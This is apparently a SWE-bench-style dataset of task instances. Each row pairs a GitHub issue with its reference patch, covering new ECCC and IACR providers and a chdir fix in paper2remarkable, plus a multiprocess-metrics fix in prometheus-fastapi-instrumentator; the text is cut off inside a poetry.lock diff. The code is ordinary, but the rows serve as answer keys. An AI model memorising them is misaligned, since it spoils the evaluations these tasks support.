repo
stringlengths 7
60
| instance_id
stringlengths 11
64
| base_commit
stringlengths 40
40
| patch
stringlengths 83
793k
| test_patch
stringclasses 1
value | problem_statement
stringlengths 22
112k
| hints_text
stringlengths 0
189k
| created_at
timestamp[ns]date 2015-02-23 20:51:45
2024-12-13 21:31:14
| environment_setup_commit
stringclasses 1
value | version
stringclasses 1
value | FAIL_TO_PASS
sequencelengths 0
0
| PASS_TO_PASS
sequencelengths 0
0
|
---|---|---|---|---|---|---|---|---|---|---|---|
GjjvdBurg/paper2remarkable | GjjvdBurg__paper2remarkable-114 | d1772da6b86c58b4dbc9fb514d151b2fcbf1672d | diff --git a/paper2remarkable/providers/__init__.py b/paper2remarkable/providers/__init__.py
index 5130147..e574b80 100644
--- a/paper2remarkable/providers/__init__.py
+++ b/paper2remarkable/providers/__init__.py
@@ -5,6 +5,7 @@
from .arxiv import Arxiv
from .citeseerx import CiteSeerX
from .cvf import CVF
+from .eccc import ECCC
from .html import HTML
from .jmlr import JMLR
from .local import LocalFile
@@ -28,6 +29,7 @@
Arxiv,
CiteSeerX,
CVF,
+ ECCC,
JMLR,
Nature,
NBER,
diff --git a/paper2remarkable/providers/eccc.py b/paper2remarkable/providers/eccc.py
new file mode 100644
index 0000000..f6a6bae
--- /dev/null
+++ b/paper2remarkable/providers/eccc.py
@@ -0,0 +1,86 @@
+# -*- coding: utf-8 -*-
+
+"""Provider for Electronic Colloquium on Computational Complexity
+
+Author: G.J.J. van den Burg
+License: See LICENSE file
+Copyright: 2021, G.J.J. van den Burg
+
+"""
+
+import bs4
+import re
+
+from ._info import Informer
+from ._base import Provider
+from ..exceptions import URLResolutionError
+from ..log import Logger
+
+logger = Logger()
+
+
+class ECCCInformer(Informer):
+ def _get_paper_div(self, soup):
+ h3 = soup.find(lambda t: t.name == "h3" and t.get_text() == "Paper:")
+ div = h3.find_next_sibling("div")
+ return bs4.BeautifulSoup(div.prettify(), "html.parser")
+
+ def get_title(self, soup):
+ divsoup = self._get_paper_div(soup)
+ h4 = divsoup.find("h4")
+ if not h4:
+ logger.warning(
+ "Couldn't determine title information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ return h4.get_text().strip()
+
+ def get_authors(self, soup):
+ divsoup = self._get_paper_div(soup)
+ aa = divsoup.find_all(
+ lambda t: t.name == "a" and t.get("href").startswith("/author/")
+ )
+ if not aa:
+ logger.warning(
+ "Couldn't determine author information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ authors = [a.get_text() for a in aa]
+ return self._format_authors(authors, sep=" ", idx=-1)
+
+ def get_year(self, soup):
+ divsoup = self._get_paper_div(soup)
+ line = next(
+ (l for l in divsoup.text.split("\n") if "Publication: " in l), None
+ )
+ if line is None:
+ logger.warning(
+ "Couldn't determine year information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ year = line.strip().split(" ")[3] # bit lazy
+ return year
+
+
+class ECCC(Provider):
+
+ re_abs = "https?://eccc.weizmann.ac.il/report/\d{4}/\d+/?$"
+ re_pdf = "https?://eccc.weizmann.ac.il/report/\d{4}/\d+/download/?$"
+
+ def __init__(self, *args, **kwargs):
+ super().__init__(*args, **kwargs)
+ self.informer = ECCCInformer()
+
+ def get_abs_pdf_urls(self, url):
+ if re.match(self.re_abs, url):
+ abs_url = url
+ pdf_url = url.rstrip("/") + "/download"
+ elif re.match(self.re_pdf, url):
+ abs_url = url.rstrip("/")[: -len("/download")]
+ pdf_url = url
+ else:
+ raise URLResolutionError("ECCC", url)
+ return abs_url, pdf_url
+
+ def validate(src):
+ return re.match(ECCC.re_abs, src) or re.match(ECCC.re_pdf, src)
| New source recommendations
I'd just quickly like to suggest two new sources that appear in theoretical computer science/cryptography, namely:
* IACR's Eprint: It is located at https://eprint.iacr.org/ . The format is that the abstract of a paper is contained at https://eprint.iacr.org/2021/489 , and the paper itself is found by appending .pdf to this https://eprint.iacr.org/2021/489.pdf
* ECCC: This is located at https://eccc.weizmann.ac.il/eccc/ . The most useful section of it is probably the `reports` section. A generic report is located at https://eccc.weizmann.ac.il/report/2021/052/ , and it can be downloaded by visiting https://eccc.weizmann.ac.il/report/2021/052/download .
| Thanks for the suggestions @mark-schultz, I'll see what I can do! | 2021-05-30T15:34:09 | 0.0 | [] | [] |
||
GjjvdBurg/paper2remarkable | GjjvdBurg__paper2remarkable-113 | d1772da6b86c58b4dbc9fb514d151b2fcbf1672d | diff --git a/paper2remarkable/crop.py b/paper2remarkable/crop.py
index 16d050e..6e4a177 100644
--- a/paper2remarkable/crop.py
+++ b/paper2remarkable/crop.py
@@ -180,7 +180,7 @@ def get_raw_bbox_pdftoppm(self, filename, resolution=72):
filename,
]
- im = subprocess.check_output(cmd)
+ im = subprocess.check_output(cmd, stderr=subprocess.DEVNULL)
im = io.BytesIO(im)
id_ = im.readline().rstrip(b"\n")
diff --git a/paper2remarkable/providers/__init__.py b/paper2remarkable/providers/__init__.py
index 5130147..fb12a21 100644
--- a/paper2remarkable/providers/__init__.py
+++ b/paper2remarkable/providers/__init__.py
@@ -6,6 +6,7 @@
from .citeseerx import CiteSeerX
from .cvf import CVF
from .html import HTML
+from .iacr import IACR
from .jmlr import JMLR
from .local import LocalFile
from .nature import Nature
@@ -28,6 +29,7 @@
Arxiv,
CiteSeerX,
CVF,
+ IACR,
JMLR,
Nature,
NBER,
diff --git a/paper2remarkable/providers/_base.py b/paper2remarkable/providers/_base.py
index 56d61e5..9357b91 100644
--- a/paper2remarkable/providers/_base.py
+++ b/paper2remarkable/providers/_base.py
@@ -142,13 +142,14 @@ def compress_pdf(self, in_pdf, out_pdf):
"%s failed to compress the PDF file." % self.pdftool
)
- def rewrite_pdf(self, in_pdf, out_pdf=None):
- """Re-write the pdf using Ghostscript
+ def rewrite_pdf(self, in_file, out_pdf=None):
+ """Re-write the ps or pdf using Ghostscript
- This helps avoid issues in dearxiv due to nested pdfs.
+ This helps avoid issues in dearxiv due to nested pdfs and enables
+ support for postscript files.
"""
if out_pdf is None:
- out_pdf = os.path.splitext(in_pdf)[0] + "-rewrite.pdf"
+ out_pdf = os.path.splitext(in_file)[0] + "-rewrite.pdf"
status = subprocess.call(
[
@@ -157,7 +158,7 @@ def rewrite_pdf(self, in_pdf, out_pdf=None):
"-dQUIET",
"-o",
out_pdf,
- in_pdf,
+ in_file,
]
)
if not status == 0:
@@ -169,6 +170,7 @@ def rewrite_pdf(self, in_pdf, out_pdf=None):
def uncompress_pdf(self, in_pdf, out_pdf):
""" Uncompress a pdf file """
+ logger.info("Uncompressing with {self.pdftool} ...")
if self.pdftool == "pdftk":
status = subprocess.call(
[
diff --git a/paper2remarkable/providers/iacr.py b/paper2remarkable/providers/iacr.py
new file mode 100644
index 0000000..f91d2e5
--- /dev/null
+++ b/paper2remarkable/providers/iacr.py
@@ -0,0 +1,111 @@
+# -*- coding: utf-8 -*-
+
+"""Provider for IACR's eprints
+
+Author: G.J.J. van den Burg
+License: See LICENSE file
+Copyright: 2019, G.J.J. van den Burg
+
+"""
+
+import bs4
+import os
+import re
+import urllib.parse
+
+from ._info import Informer
+from ._base import Provider
+from ..exceptions import URLResolutionError
+from ..log import Logger
+from ..utils import get_page_with_retry
+
+logger = Logger()
+
+
+class IACRInformer(Informer):
+ def get_title(self, soup):
+ title = soup.find_all("title")
+ if not title:
+ logger.warning(
+ "Couldn't determine title information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ return title[0].get_text().split("-", maxsplit=1)[-1]
+
+ def get_authors(self, soup):
+ i = soup.find_all("i")
+ if not i:
+ logger.warning(
+ "Couldn't determine author information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ authors = i[0].get_text()
+ authors = authors.replace(" ", " ")
+ authors = authors.split(" and ")
+ return self._format_authors(authors, sep=" ", idx=-1)
+
+ def get_year(self, soup):
+ h2 = soup.find_all("h2")
+ if not h2:
+ logger.warning(
+ "Couldn't determine year information, maybe provide the desired filename using '--filename'?"
+ )
+ return ""
+ text = h2[0].get_text()
+ report = text.split(":", maxsplit=1)[-1]
+ year_num = report.strip().split(" ")[1]
+ year = year_num.split("/")[0]
+ return year
+
+
+class IACR(Provider):
+
+ re_abs = "https?://eprint.iacr.org/\d{4}/\d+$"
+ re_pdf = "https?://eprint.iacr.org/\d{4}/\d+\.pdf$"
+ re_ps = "https?://eprint.iacr.org/\d{4}/\d+\.ps$"
+
+ def __init__(self, *args, **kwargs):
+ super().__init__(*args, **kwargs)
+ self.informer = IACRInformer()
+
+ def _get_doc_url(self, abs_url):
+ page = get_page_with_retry(abs_url)
+ soup = bs4.BeautifulSoup(page, "html.parser")
+
+ bb = soup.find_all("b")
+ b = next((b for b in bb if "Available format" in b.get_text()), None)
+ if b is None:
+ # Fallback
+ return abs_url + ".pdf"
+ aa = b.find_next_siblings("a")
+ a = next((a for a in aa if "PDF" in a.get_text()), None)
+ if not a is None:
+ return urllib.parse.urljoin(abs_url, a.get("href"))
+ a = next((a for a in aa if "Postscript (PS)" in a.get_text()), None)
+ if not a is None:
+ return urllib.parse.urljoin(abs_url, a.get("href"))
+ # Fallback
+ return abs_url + ".pdf"
+
+ def get_abs_pdf_urls(self, url):
+ if re.match(self.re_abs, url):
+ abs_url = url
+ pdf_url = self._get_doc_url(url)
+ elif re.match(self.re_pdf, url):
+ abs_url = url[: -len(".pdf")]
+ pdf_url = url
+ elif re.match(self.re_ps, url):
+ abs_url = url[: -len(".ps")]
+ pdf_url = url
+ else:
+ raise URLResolutionError("IACR", url)
+ return abs_url, pdf_url
+
+ def retrieve_pdf(self, pdf_url, filename):
+ # Bit hacky, can consider adding first-class PS support
+ tmpfilename = os.path.splitext(filename)[0] + "-tmp.pdf"
+ super().retrieve_pdf(pdf_url, tmpfilename)
+ self.rewrite_pdf(tmpfilename, out_pdf=filename)
+
+ def validate(src):
+ return re.match(IACR.re_abs, src) or re.match(IACR.re_pdf, src)
| New source recommendations
I'd just quickly like to suggest two new sources that appear in theoretical computer science/cryptography, namely:
* IACR's Eprint: It is located at https://eprint.iacr.org/ . The format is that the abstract of a paper is contained at https://eprint.iacr.org/2021/489 , and the paper itself is found by appending .pdf to this https://eprint.iacr.org/2021/489.pdf
* ECCC: This is located at https://eccc.weizmann.ac.il/eccc/ . The most useful section of it is probably the `reports` section. A generic report is located at https://eccc.weizmann.ac.il/report/2021/052/ , and it can be downloaded by visiting https://eccc.weizmann.ac.il/report/2021/052/download .
| Thanks for the suggestions @mark-schultz, I'll see what I can do! | 2021-05-30T14:48:10 | 0.0 | [] | [] |
||
GjjvdBurg/paper2remarkable | GjjvdBurg__paper2remarkable-112 | 94308fa2625c63219d880bdf5285de7fd16ca29f | diff --git a/paper2remarkable/providers/_base.py b/paper2remarkable/providers/_base.py
index 369d566..56d61e5 100644
--- a/paper2remarkable/providers/_base.py
+++ b/paper2remarkable/providers/_base.py
@@ -20,6 +20,7 @@
from ..pdf_ops import prepare_pdf, blank_pdf, shrink_pdf
from ..utils import (
assert_file_is_pdf,
+ chdir,
check_pdftool,
download_url,
follow_redirects,
@@ -211,33 +212,33 @@ def run(self, src, filename=None):
self.initial_dir = os.getcwd()
with tempfile.TemporaryDirectory(prefix="p2r_") as working_dir:
- os.chdir(working_dir)
- self.retrieve_pdf(pdf_url, tmp_filename)
-
- assert_file_is_pdf(tmp_filename)
-
- intermediate_fname = tmp_filename
- for opname, op in self.operations:
- intermediate_fname = op(intermediate_fname)
-
- shutil.copy(intermediate_fname, clean_filename)
-
- if self.debug:
- print("Paused in debug mode in dir: %s" % working_dir)
- print("Press enter to exit.")
- return input()
-
- if self.upload:
- return upload_to_remarkable(
- clean_filename,
- remarkable_dir=self.remarkable_dir,
- rmapi_path=self.rmapi_path,
- )
-
- target_path = os.path.join(self.initial_dir, clean_filename)
- while os.path.exists(target_path):
- base = os.path.splitext(target_path)[0]
- target_path = base + "_.pdf"
- shutil.move(clean_filename, target_path)
- os.chdir(self.initial_dir)
+ with chdir(working_dir):
+ self.retrieve_pdf(pdf_url, tmp_filename)
+
+ assert_file_is_pdf(tmp_filename)
+
+ intermediate_fname = tmp_filename
+ for opname, op in self.operations:
+ intermediate_fname = op(intermediate_fname)
+
+ shutil.copy(intermediate_fname, clean_filename)
+
+ if self.debug:
+ print("Paused in debug mode in dir: %s" % working_dir)
+ print("Press enter to exit.")
+ return input()
+
+ if self.upload:
+ return upload_to_remarkable(
+ clean_filename,
+ remarkable_dir=self.remarkable_dir,
+ rmapi_path=self.rmapi_path,
+ )
+
+ target_path = os.path.join(self.initial_dir, clean_filename)
+ while os.path.exists(target_path):
+ base = os.path.splitext(target_path)[0]
+ target_path = base + "_.pdf"
+ shutil.move(clean_filename, target_path)
+
return target_path
diff --git a/paper2remarkable/ui.py b/paper2remarkable/ui.py
index 1d1e011..c05961e 100644
--- a/paper2remarkable/ui.py
+++ b/paper2remarkable/ui.py
@@ -280,6 +280,31 @@ def exception_handler(exception_type, value, traceback):
sys.excepthook = exception_handler
+def runner(inputs, filenames, options, remarkable_dir="/", debug=False):
+ if not len(inputs) == len(filenames):
+ raise ValueError("Number of inputs and filenames must be the same")
+ for cli_input, filename in zip(inputs, filenames):
+ provider, new_input, cookiejar = choose_provider(cli_input)
+ prov = provider(
+ verbose=options["core"]["verbose"],
+ upload=options["core"]["upload"],
+ debug=debug,
+ experimental=options["core"]["experimental"],
+ crop=options["core"]["crop"],
+ blank=options["core"]["blank"],
+ remarkable_dir=remarkable_dir,
+ rmapi_path=options["system"]["rmapi"],
+ pdftoppm_path=options["system"]["pdftoppm"],
+ pdftk_path=options["system"]["pdftk"],
+ qpdf_path=options["system"]["qpdf"],
+ gs_path=options["system"]["gs"],
+ css=options["html"]["css"],
+ font_urls=options["html"]["font_urls"],
+ cookiejar=cookiejar,
+ )
+ prov.run(new_input, filename=filename)
+
+
def main():
args = parse_args()
set_excepthook(args.debug)
@@ -305,23 +330,4 @@ def main():
[None] * len(args.input) if not args.filename else args.filename
)
- for cli_input, filename in zip(args.input, filenames):
- provider, new_input, cookiejar = choose_provider(cli_input)
- prov = provider(
- verbose=options["core"]["verbose"],
- upload=options["core"]["upload"],
- debug=args.debug,
- experimental=options["core"]["experimental"],
- crop=options["core"]["crop"],
- blank=options["core"]["blank"],
- remarkable_dir=args.remarkable_dir,
- rmapi_path=options["system"]["rmapi"],
- pdftoppm_path=options["system"]["pdftoppm"],
- pdftk_path=options["system"]["pdftk"],
- qpdf_path=options["system"]["qpdf"],
- gs_path=options["system"]["gs"],
- css=options["html"]["css"],
- font_urls=options["html"]["font_urls"],
- cookiejar=cookiejar,
- )
- prov.run(new_input, filename=filename)
+ runner(args.input, filenames, options, debug=args.debug)
diff --git a/paper2remarkable/utils.py b/paper2remarkable/utils.py
index 0003103..5ea25fd 100644
--- a/paper2remarkable/utils.py
+++ b/paper2remarkable/utils.py
@@ -8,6 +8,7 @@
"""
+import os
import regex
import requests
import string
@@ -203,3 +204,18 @@ def check_pdftool(pdftk_path, qpdf_path):
if status == 0:
return "qpdf"
raise NoPDFToolError
+
+
+class chdir:
+ """Change directory in context and return to original on exit or failure"""
+
+ def __init__(self, target: str):
+ self._target = target
+ self._original_dir = None
+
+ def __enter__(self):
+ self._original_dir = os.getcwd()
+ os.chdir(self._target)
+
+ def __exit__(self, exc_type, exc_value, traceback):
+ os.chdir(self._original_dir)
| [Errno 2] No such file or directory
When inputing multiple papers I get a directory error:
```
>>> p2r -V
0.9.3
>>> p2r -v -p /papers/arxiv/24-05-2021/ https://arxiv.org/abs/2105.09956 https://arxiv.org/abs/2105.10474 https://arxiv.org/abs/2105.10163
2021-05-24 09:58:14 - INFO - Starting Arxiv provider
2021-05-24 09:58:14 - INFO - Generating output filename
2021-05-24 09:58:14 - INFO - Getting paper info
2021-05-24 09:58:15 - INFO - Downloaded url: https://arxiv.org/abs/2105.09956
2021-05-24 09:58:15 - INFO - Created filename: Sazonova_et_al_-_Are_All_Post-Starbursts_Mergers_HST_Reveals_Hidden_Disturbances_in_the_Majority_of_PSBs_2021.pdf
2021-05-24 09:58:15 - INFO - Downloading file at url: https://arxiv.org/pdf/2105.09956.pdf
2021-05-24 09:58:33 - INFO - Downloaded url: https://arxiv.org/pdf/2105.09956.pdf
2021-05-24 09:58:34 - INFO - Removing arXiv timestamp ... success
2021-05-24 09:59:10 - INFO - Preparing PDF using crop operation
2021-05-24 09:59:19 - INFO - Processing pages ... (10/31)
2021-05-24 09:59:26 - INFO - Processing pages ... (20/31)
2021-05-24 09:59:29 - INFO - Processing pages ... (30/31)
2021-05-24 09:59:32 - INFO - Processing pages ... (31/31)
2021-05-24 09:59:32 - INFO - Shrinking pdf file ...
2021-05-24 09:59:51 - INFO - Shrinking has no effect for this file, using original.
2021-05-24 09:59:51 - INFO - Starting upload to reMarkable
2021-05-24 10:00:03 - INFO - Upload successful.
2021-05-24 10:00:03 - INFO - Starting Arxiv provider
2021-05-24 10:00:03 - INFO - Generating output filename
2021-05-24 10:00:03 - INFO - Getting paper info
2021-05-24 10:00:04 - INFO - Downloaded url: https://arxiv.org/abs/2105.10474
2021-05-24 10:00:04 - INFO - Created filename: Zhang_et_al_-_Trinity_I_Self-Consistently_Modeling_the_Dark_Matter_Halo-Galaxy-Supermassive_Black_Hole_Connection_From_Z_0-10_2021.pdf
[Errno 2] No such file or directory
```
However, when I do them one by one, it succeeds
PS. this is such a great tool!
| 2021-05-29T13:55:43 | 0.0 | [] | [] |
|||
trallnag/prometheus-fastapi-instrumentator | trallnag__prometheus-fastapi-instrumentator-229 | c8585927771a8dabc32b5dea8051e79207a3fdcb | diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml
index 331e2fb..02c1ada 100644
--- a/.github/workflows/ci.yaml
+++ b/.github/workflows/ci.yaml
@@ -69,10 +69,10 @@ jobs:
- name: Run multi process tests with Pytest
run: |
- export PROMETHEUS_MULTIPROC_DIR=/tmp/one-two-three
+ export PROMETHEUS_MULTIPROC_DIR=/tmp/pfi-tests/multiproc
rm -rf $PROMETHEUS_MULTIPROC_DIR
mkdir -p $PROMETHEUS_MULTIPROC_DIR
- poetry run pytest -k test_multiprocess \
+ poetry run pytest -k test_multiproc \
--cov-append --cov-report=term-missing --cov-report=xml --cov=src
- name: Upload coverage to Codecov
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 77e465d..bc2c8fe 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,17 @@ and adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0).
### Fixed
+- Fixed multi process mode in `expose()` method that handles the `/metrics`
+ endpoint. Due to reusing the registry assigned to the instrumentator it could
+ lead to duplicated metrics. Now the endpoint follows recommendation from
+ Prometheus client library documentation. Also improved multi process unit
+ tests. Closed issue
+ [#228](https://github.com/trallnag/prometheus-fastapi-instrumentator/issues/228)
+ and
+ [#227](https://github.com/trallnag/prometheus-fastapi-instrumentator/issues/227).
+ Fixed in pull request
+ [#229](https://github.com/trallnag/prometheus-fastapi-instrumentator/pull/229).
+
- Fixed `NameError` and "Duplicated timeseries..." errors that started to occur
with latest versions of Starlette / FastAPI in combination with multiple
middlewares. Instrumentation closures are now optional and the instrumentator
diff --git a/Taskfile.yaml b/Taskfile.yaml
index 045e329..2b4a7cd 100644
--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -5,6 +5,7 @@ tasks:
- task: fmt
- task: lint
- task: test
+ - task: test-mp
fmt:
desc: Run formatters.
@@ -22,14 +23,17 @@ tasks:
test:
desc: Run tests.
cmds:
- - poetry run pytest --cov-report=term-missing --cov-report=xml --cov=src
+ - poetry run pytest {{ .COVERAGE }}
+ vars:
+ COVERAGE: --cov-report=term-missing --cov-report=xml --cov=src
test-mp:
desc: Run multi process tests.
cmds:
- rm -rf $PROMETHEUS_MULTIPROC_DIR
- mkdir -p $PROMETHEUS_MULTIPROC_DIR
- - poetry run pytest -k test_multiprocess
- --cov-append --cov-report=term-missing --cov-report=xml --cov=src
+ - poetry run pytest -k test_multiproc {{ .COVERAGE }}
+ vars:
+ COVERAGE: --cov-append --cov-report=term-missing --cov-report=xml --cov=src
env:
- PROMETHEUS_MULTIPROC_DIR: /tmp/prometheus-fastapi-instrumentator/multiproc
+ PROMETHEUS_MULTIPROC_DIR: /tmp/pfi-tests/multiproc
diff --git a/poetry.lock b/poetry.lock
index c481036..94dc752 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -79,32 +79,46 @@ tests-no-zope = ["cloudpickle", "cloudpickle", "hypothesis", "hypothesis", "mypy
[[package]]
name = "black"
-version = "22.12.0"
+version = "23.1.0"
description = "The uncompromising code formatter."
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "black-22.12.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9eedd20838bd5d75b80c9f5487dbcb06836a43833a37846cf1d8c1cc01cef59d"},
- {file = "black-22.12.0-cp310-cp310-win_amd64.whl", hash = "sha256:159a46a4947f73387b4d83e87ea006dbb2337eab6c879620a3ba52699b1f4351"},
- {file = "black-22.12.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d30b212bffeb1e252b31dd269dfae69dd17e06d92b87ad26e23890f3efea366f"},
- {file = "black-22.12.0-cp311-cp311-win_amd64.whl", hash = "sha256:7412e75863aa5c5411886804678b7d083c7c28421210180d67dfd8cf1221e1f4"},
- {file = "black-22.12.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c116eed0efb9ff870ded8b62fe9f28dd61ef6e9ddd28d83d7d264a38417dcee2"},
- {file = "black-22.12.0-cp37-cp37m-win_amd64.whl", hash = "sha256:1f58cbe16dfe8c12b7434e50ff889fa479072096d79f0a7f25e4ab8e94cd8350"},
- {file = "black-22.12.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:77d86c9f3db9b1bf6761244bc0b3572a546f5fe37917a044e02f3166d5aafa7d"},
- {file = "black-22.12.0-cp38-cp38-win_amd64.whl", hash = "sha256:82d9fe8fee3401e02e79767016b4907820a7dc28d70d137eb397b92ef3cc5bfc"},
- {file = "black-22.12.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:101c69b23df9b44247bd88e1d7e90154336ac4992502d4197bdac35dd7ee3320"},
- {file = "black-22.12.0-cp39-cp39-win_amd64.whl", hash = "sha256:559c7a1ba9a006226f09e4916060982fd27334ae1998e7a38b3f33a37f7a2148"},
- {file = "black-22.12.0-py3-none-any.whl", hash = "sha256:436cc9167dd28040ad90d3b404aec22cedf24a6e4d7de221bec2730ec0c97bcf"},
- {file = "black-22.12.0.tar.gz", hash = "sha256:229351e5a18ca30f447bf724d007f890f97e13af070bb6ad4c0a441cd7596a2f"},
+ {file = "black-23.1.0-cp310-cp310-macosx_10_16_arm64.whl", hash = "sha256:b6a92a41ee34b883b359998f0c8e6eb8e99803aa8bf3123bf2b2e6fec505a221"},
+ {file = "black-23.1.0-cp310-cp310-macosx_10_16_universal2.whl", hash = "sha256:57c18c5165c1dbe291d5306e53fb3988122890e57bd9b3dcb75f967f13411a26"},
+ {file = "black-23.1.0-cp310-cp310-macosx_10_16_x86_64.whl", hash = "sha256:9880d7d419bb7e709b37e28deb5e68a49227713b623c72b2b931028ea65f619b"},
+ {file = "black-23.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e6663f91b6feca5d06f2ccd49a10f254f9298cc1f7f49c46e498a0771b507104"},
+ {file = "black-23.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:9afd3f493666a0cd8f8df9a0200c6359ac53940cbde049dcb1a7eb6ee2dd7074"},
+ {file = "black-23.1.0-cp311-cp311-macosx_10_16_arm64.whl", hash = "sha256:bfffba28dc52a58f04492181392ee380e95262af14ee01d4bc7bb1b1c6ca8d27"},
+ {file = "black-23.1.0-cp311-cp311-macosx_10_16_universal2.whl", hash = "sha256:c1c476bc7b7d021321e7d93dc2cbd78ce103b84d5a4cf97ed535fbc0d6660648"},
+ {file = "black-23.1.0-cp311-cp311-macosx_10_16_x86_64.whl", hash = "sha256:382998821f58e5c8238d3166c492139573325287820963d2f7de4d518bd76958"},
+ {file = "black-23.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2bf649fda611c8550ca9d7592b69f0637218c2369b7744694c5e4902873b2f3a"},
+ {file = "black-23.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:121ca7f10b4a01fd99951234abdbd97728e1240be89fde18480ffac16503d481"},
+ {file = "black-23.1.0-cp37-cp37m-macosx_10_16_x86_64.whl", hash = "sha256:a8471939da5e824b891b25751955be52ee7f8a30a916d570a5ba8e0f2eb2ecad"},
+ {file = "black-23.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8178318cb74f98bc571eef19068f6ab5613b3e59d4f47771582f04e175570ed8"},
+ {file = "black-23.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:a436e7881d33acaf2536c46a454bb964a50eff59b21b51c6ccf5a40601fbef24"},
+ {file = "black-23.1.0-cp38-cp38-macosx_10_16_arm64.whl", hash = "sha256:a59db0a2094d2259c554676403fa2fac3473ccf1354c1c63eccf7ae65aac8ab6"},
+ {file = "black-23.1.0-cp38-cp38-macosx_10_16_universal2.whl", hash = "sha256:0052dba51dec07ed029ed61b18183942043e00008ec65d5028814afaab9a22fd"},
+ {file = "black-23.1.0-cp38-cp38-macosx_10_16_x86_64.whl", hash = "sha256:49f7b39e30f326a34b5c9a4213213a6b221d7ae9d58ec70df1c4a307cf2a1580"},
+ {file = "black-23.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:162e37d49e93bd6eb6f1afc3e17a3d23a823042530c37c3c42eeeaf026f38468"},
+ {file = "black-23.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:8b70eb40a78dfac24842458476135f9b99ab952dd3f2dab738c1881a9b38b753"},
+ {file = "black-23.1.0-cp39-cp39-macosx_10_16_arm64.whl", hash = "sha256:a29650759a6a0944e7cca036674655c2f0f63806ddecc45ed40b7b8aa314b651"},
+ {file = "black-23.1.0-cp39-cp39-macosx_10_16_universal2.whl", hash = "sha256:bb460c8561c8c1bec7824ecbc3ce085eb50005883a6203dcfb0122e95797ee06"},
+ {file = "black-23.1.0-cp39-cp39-macosx_10_16_x86_64.whl", hash = "sha256:c91dfc2c2a4e50df0026f88d2215e166616e0c80e86004d0003ece0488db2739"},
+ {file = "black-23.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a951cc83ab535d248c89f300eccbd625e80ab880fbcfb5ac8afb5f01a258ac9"},
+ {file = "black-23.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:0680d4380db3719ebcfb2613f34e86c8e6d15ffeabcf8ec59355c5e7b85bb555"},
+ {file = "black-23.1.0-py3-none-any.whl", hash = "sha256:7a0f701d314cfa0896b9001df70a530eb2472babb76086344e688829efd97d32"},
+ {file = "black-23.1.0.tar.gz", hash = "sha256:b0bd97bea8903f5a2ba7219257a44e3f1f9d00073d6cc1add68f0beec69692ac"},
]
[package.dependencies]
click = ">=8.0.0"
mypy-extensions = ">=0.4.3"
+packaging = ">=22.0"
pathspec = ">=0.9.0"
platformdirs = ">=2"
-tomli = {version = ">=1.1.0", markers = "python_full_version < \"3.11.0a7\""}
+tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
typed-ast = {version = ">=1.4.2", markers = "python_version < \"3.8\" and implementation_name == \"cpython\""}
typing-extensions = {version = ">=3.10.0.0", markers = "python_version < \"3.10\""}
@@ -126,114 +140,89 @@ files = [
{file = "certifi-2022.12.7.tar.gz", hash = "sha256:35824b4c3a97115964b408844d64aa14db1cc518f6562e8d7261699d1350a9e3"},
]
-[[package]]
-name = "cfgv"
-version = "3.3.1"
-description = "Validate configuration and produce human readable error messages."
-category = "dev"
-optional = false
-python-versions = ">=3.6.1"
-files = [
- {file = "cfgv-3.3.1-py2.py3-none-any.whl", hash = "sha256:c6a0883f3917a037485059700b9e75da2464e6c27051014ad85ba6aaa5884426"},
- {file = "cfgv-3.3.1.tar.gz", hash = "sha256:f5a830efb9ce7a445376bb66ec94c638a9787422f96264c98edc6bdeed8ab736"},
-]
-
[[package]]
name = "charset-normalizer"
-version = "3.0.1"
+version = "3.1.0"
description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
category = "dev"
optional = false
-python-versions = "*"
+python-versions = ">=3.7.0"
files = [
- {file = "charset-normalizer-3.0.1.tar.gz", hash = "sha256:ebea339af930f8ca5d7a699b921106c6e29c617fe9606fa7baa043c1cdae326f"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:88600c72ef7587fe1708fd242b385b6ed4b8904976d5da0893e31df8b3480cb6"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c75ffc45f25324e68ab238cb4b5c0a38cd1c3d7f1fb1f72b5541de469e2247db"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:db72b07027db150f468fbada4d85b3b2729a3db39178abf5c543b784c1254539"},
- {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62595ab75873d50d57323a91dd03e6966eb79c41fa834b7a1661ed043b2d404d"},
